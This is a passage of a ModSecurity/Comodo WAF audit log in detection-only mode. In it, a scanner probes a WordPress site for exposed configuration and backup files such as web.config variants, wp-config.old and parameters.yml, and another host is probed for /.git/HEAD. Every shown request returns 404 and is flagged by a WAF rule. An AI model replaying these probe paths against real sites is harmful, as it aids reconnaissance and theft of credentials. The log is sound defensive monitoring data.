p1=352, p2=1511, p3=0, p4=0, p5=121, sr=96, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d3f97b00-Z-- --9d0f506b-A-- [15/Jun/2025:00:03:38.530884 +0530] aE3AgEelxpbOl24z1sUe_QAAAAQ 185.177.72.108 43302 127.0.0.1 7081 --9d0f506b-B-- GET /app/config/parameters.yml HTTP/1.0 Host: www.tandonamit.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --9d0f506b-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.tandonamit.com/wp-json/>; rel="https://api.w.org/" Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 28893 Connection: close Content-Type: text/html; charset=UTF-8 --9d0f506b-H-- Message: Warning. Matched phrase "/config/parameters.yml" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/config/parameters.yml" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.tandonamit.com"] [uri "/app/config/parameters.yml"] [unique_id "aE3AgEelxpbOl24z1sUe_QAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/tandonamit.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749926016808158 1722790 (- - -) Stopwatch2: 1749926016808158 1722790; combined=2615, p1=529, p2=2011, p3=0, p4=0, p5=75, sr=125, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9d0f506b-Z-- --de120a3c-A-- [15/Jun/2025:00:03:40.500549 +0530] aE3Agij1NB6R8D1b9l7EDAAAAAE 185.177.72.108 43424 127.0.0.1 7081 --de120a3c-B-- GET /app/config/routes.cfg HTTP/1.0 Host: www.tandonamit.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --de120a3c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.tandonamit.com/wp-json/>; rel="https://api.w.org/" Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 28890 Connection: close Content-Type: text/html; charset=UTF-8 --de120a3c-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.tandonamit.com|F|2"] [data ".cfg"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.tandonamit.com|F|2"] [data ".cfg"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.tandonamit.com"] [uri "/app/config/routes.cfg"] [unique_id "aE3Agij1NB6R8D1b9l7EDAAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/tandonamit.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749926018778797 1721819 (- - -) Stopwatch2: 1749926018778797 1721819; combined=2431, p1=410, p2=1935, p3=0, p4=0, p5=85, sr=106, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --de120a3c-Z-- --ffa99508-A-- [15/Jun/2025:00:03:46.250008 +0530] aE3AiG3GPR2TokqXa4EKBQAAAAA 185.177.72.108 40128 127.0.0.1 7081 --ffa99508-B-- GET /admin/.config HTTP/1.0 Host: www.tandonamit.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --ffa99508-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.tandonamit.com/wp-json/>; rel="https://api.w.org/" Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 28837 Connection: close Content-Type: text/html; charset=UTF-8 --ffa99508-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.tandonamit.com|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.tandonamit.com|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.tandonamit.com"] [uri "/admin/.config"] [unique_id "aE3AiG3GPR2TokqXa4EKBQAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/tandonamit.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749926024573352 1676720 (- - -) Stopwatch2: 1749926024573352 1676720; combined=2247, p1=416, p2=1757, p3=0, p4=0, p5=74, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ffa99508-Z-- --ffa99508-A-- [15/Jun/2025:00:03:50.146587 +0530] aE3AjLXIppi-TUGr1MJ-NgAAAAU 185.177.72.108 40282 127.0.0.1 7081 --ffa99508-B-- GET /web.config HTTP/1.0 Host: www.tandonamit.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --ffa99508-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.tandonamit.com/wp-json/>; rel="https://api.w.org/" Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 28834 Connection: close Content-Type: text/html; charset=UTF-8 --ffa99508-H-- Message: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.tandonamit.com|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.tandonamit.com"] [uri "/web.config"] [unique_id "aE3AjLXIppi-TUGr1MJ-NgAAAAU"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.tandonamit.com|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.tandonamit.com"] [uri "/web.config"] [unique_id "aE3AjLXIppi-TUGr1MJ-NgAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/tandonamit.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749926028482987 1663692 (- - -) Stopwatch2: 1749926028482987 1663692; combined=2133, p1=405, p2=1584, p3=0, p4=0, p5=143, sr=93, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ffa99508-Z-- --dbba024e-A-- [15/Jun/2025:00:03:52.016744 +0530] aE3AjoQvQ5lW-c5YySCi9gAAAAc 185.177.72.108 44920 127.0.0.1 7081 --dbba024e-B-- GET /web.config.bak HTTP/1.0 Host: www.tandonamit.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --dbba024e-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.tandonamit.com/wp-json/>; rel="https://api.w.org/" Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 28834 Connection: close Content-Type: text/html; charset=UTF-8 --dbba024e-H-- Message: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.tandonamit.com|F|2"] [data ".config.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.tandonamit.com"] [uri "/web.config.bak"] [unique_id "aE3AjoQvQ5lW-c5YySCi9gAAAAc"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.tandonamit.com|F|2"] [data ".config.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.tandonamit.com"] [uri "/web.config.bak"] [unique_id "aE3AjoQvQ5lW-c5YySCi9gAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/tandonamit.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749926030371786 1645024 (- - -) Stopwatch2: 1749926030371786 1645024; combined=1929, p1=377, p2=1437, p3=0, p4=0, p5=114, sr=89, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --dbba024e-Z-- --a5d0d949-A-- [15/Jun/2025:00:03:54.012974 +0530] aE3AkEelxpbOl24z1sUfBgAAAAQ 185.177.72.108 45042 127.0.0.1 7081 --a5d0d949-B-- GET /web.config.bakup HTTP/1.0 Host: www.tandonamit.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --a5d0d949-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.tandonamit.com/wp-json/>; rel="https://api.w.org/" Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 28834 Connection: close Content-Type: text/html; charset=UTF-8 --a5d0d949-H-- Message: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.tandonamit.com"] [uri "/web.config.bakup"] [unique_id "aE3AkEelxpbOl24z1sUfBgAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/tandonamit.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749926032248951 1764088 (- - -) Stopwatch2: 1749926032248951 1764088; combined=2043, p1=410, p2=1545, p3=0, p4=0, p5=88, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a5d0d949-Z-- --0a94d971-A-- [15/Jun/2025:00:03:55.923896 +0530] aE3Akv7cRvnxskD-AFcS1wAAAAY 185.177.72.108 45072 127.0.0.1 7081 --0a94d971-B-- GET /web.config.old HTTP/1.0 Host: www.tandonamit.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --0a94d971-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.tandonamit.com/wp-json/>; rel="https://api.w.org/" Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 28836 Connection: close Content-Type: text/html; charset=UTF-8 --0a94d971-H-- Message: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.tandonamit.com|F|2"] [data ".config.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.tandonamit.com"] [uri "/web.config.old"] [unique_id "aE3Akv7cRvnxskD-AFcS1wAAAAY"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.tandonamit.com|F|2"] [data ".config.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.tandonamit.com"] [uri "/web.config.old"] [unique_id "aE3Akv7cRvnxskD-AFcS1wAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/tandonamit.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749926034237092 1686879 (- - -) Stopwatch2: 1749926034237092 1686879; combined=2559, p1=513, p2=1919, p3=0, p4=0, p5=127, sr=136, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0a94d971-Z-- --44a9587d-A-- [15/Jun/2025:00:03:57.810371 +0530] aE3AlOblMrvfPBGDB2xB8wAAAAg 185.177.72.108 45126 127.0.0.1 7081 --44a9587d-B-- GET /web.config.temp HTTP/1.0 Host: www.tandonamit.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --44a9587d-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.tandonamit.com/wp-json/>; rel="https://api.w.org/" Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 28833 Connection: close Content-Type: text/html; charset=UTF-8 --44a9587d-H-- Message: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.tandonamit.com"] [uri "/web.config.temp"] [unique_id "aE3AlOblMrvfPBGDB2xB8wAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/tandonamit.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749926036148130 1662308 (- - -) Stopwatch2: 1749926036148130 1662308; combined=1700, p1=403, p2=1213, p3=0, p4=0, p5=84, sr=131, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --44a9587d-Z-- --d78d9648-A-- [15/Jun/2025:00:03:59.727872 +0530] aE3Alm3GPR2TokqXa4EKCgAAAAA 185.177.72.108 45152 127.0.0.1 7081 --d78d9648-B-- GET /web.config.tmp HTTP/1.0 Host: www.tandonamit.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --d78d9648-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.tandonamit.com/wp-json/>; rel="https://api.w.org/" Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 28836 Connection: close Content-Type: text/html; charset=UTF-8 --d78d9648-H-- Message: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.tandonamit.com"] [uri "/web.config.tmp"] [unique_id "aE3Alm3GPR2TokqXa4EKCgAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/tandonamit.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749926038033630 1694316 (- - -) Stopwatch2: 1749926038033630 1694316; combined=1881, p1=343, p2=1450, p3=0, p4=0, p5=88, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d78d9648-Z-- --ff18f355-A-- [15/Jun/2025:00:04:01.755554 +0530] aE3Al0elxpbOl24z1sUfCAAAAAQ 185.177.72.108 60924 127.0.0.1 7081 --ff18f355-B-- GET /web.config.txt HTTP/1.0 Host: www.tandonamit.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --ff18f355-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.tandonamit.com/wp-json/>; rel="https://api.w.org/" Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 28836 Connection: close Content-Type: text/html; charset=UTF-8 --ff18f355-H-- Message: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.tandonamit.com"] [uri "/web.config.txt"] [unique_id "aE3Al0elxpbOl24z1sUfCAAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/tandonamit.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749926039952040 1803607 (- - -) Stopwatch2: 1749926039952040 1803607; combined=2209, p1=500, p2=1582, p3=0, p4=0, p5=126, sr=153, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ff18f355-Z-- --328b8f25-A-- [15/Jun/2025:00:04:04.605730 +0530] aE3AmvgQcZu6vRSfy050-wAAAAI 185.177.72.108 32826 127.0.0.1 7081 --328b8f25-B-- GET /wp-config.inc HTTP/1.0 Host: www.tandonamit.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --328b8f25-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.tandonamit.com/wp-json/>; rel="https://api.w.org/" Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 28834 Connection: close Content-Type: text/html; charset=UTF-8 --328b8f25-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.tandonamit.com|F|2"] [data ".inc"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.tandonamit.com|F|2"] [data ".inc"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.tandonamit.com"] [uri "/wp-config.inc"] [unique_id "aE3AmvgQcZu6vRSfy050-wAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/tandonamit.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749926042926887 1678917 (- - -) Stopwatch2: 1749926042926887 1678917; combined=2032, p1=338, p2=1611, p3=0, p4=0, p5=82, sr=89, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --328b8f25-Z-- --01c20613-A-- [15/Jun/2025:00:04:06.615789 +0530] aE3AnLXIppi-TUGr1MJ-PQAAAAU 185.177.72.108 32884 127.0.0.1 7081 --01c20613-B-- GET /wp-config.old HTTP/1.0 Host: www.tandonamit.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --01c20613-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.tandonamit.com/wp-json/>; rel="https://api.w.org/" Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 28834 Connection: close Content-Type: text/html; charset=UTF-8 --01c20613-H-- Message: Warning. Matched phrase "wp-config.old" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.tandonamit.com|F|2"] [data ".old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.old" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.tandonamit.com"] [uri "/wp-config.old"] [unique_id "aE3AnLXIppi-TUGr1MJ-PQAAAAU"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.tandonamit.com|F|2"] [data ".old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.tandonamit.com"] [uri "/wp-config.old"] [unique_id "aE3AnLXIppi-TUGr1MJ-PQAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/tandonamit.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749926044841874 1773980 (- - -) Stopwatch2: 1749926044841874 1773980; combined=2147, p1=488, p2=1537, p3=0, p4=0, p5=121, sr=134, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --01c20613-Z-- --96aa1d38-A-- [15/Jun/2025:00:04:16.571977 +0530] aE3Apyj1NB6R8D1b9l7EIAAAAAE 182.253.238.235 49782 127.0.0.1 7081 --96aa1d38-B-- GET /.git/HEAD HTTP/1.0 Host: archangledesignstudio.com X-Real-IP: 182.253.238.235 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 